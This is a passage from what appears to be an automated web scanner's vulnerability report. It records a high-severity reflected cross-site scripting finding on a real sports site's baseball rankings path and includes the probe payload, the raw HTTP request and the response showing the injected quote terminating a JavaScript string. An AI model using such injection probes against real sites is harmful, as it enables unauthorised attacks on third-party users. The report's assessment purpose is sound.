Date: Thu, 05 May 2011 10:53:06 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13088

<!DOCTYPE html>
<html>


<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:promo14ed8";39d6845c6c7:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:promo14ed8";39d6845c6c7:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.87. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fantasysource.sportingnews.com
Path:	/baseball/rankings

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 193e1"%3b34ee4aa9b68 was submitted in the REST URL parameter 1. This input was echoed as 193e1";34ee4aa9b68 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /baseball193e1"%3b34ee4aa9b68/rankings HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:54:22 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseball193e1";34ee4aa9b68:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript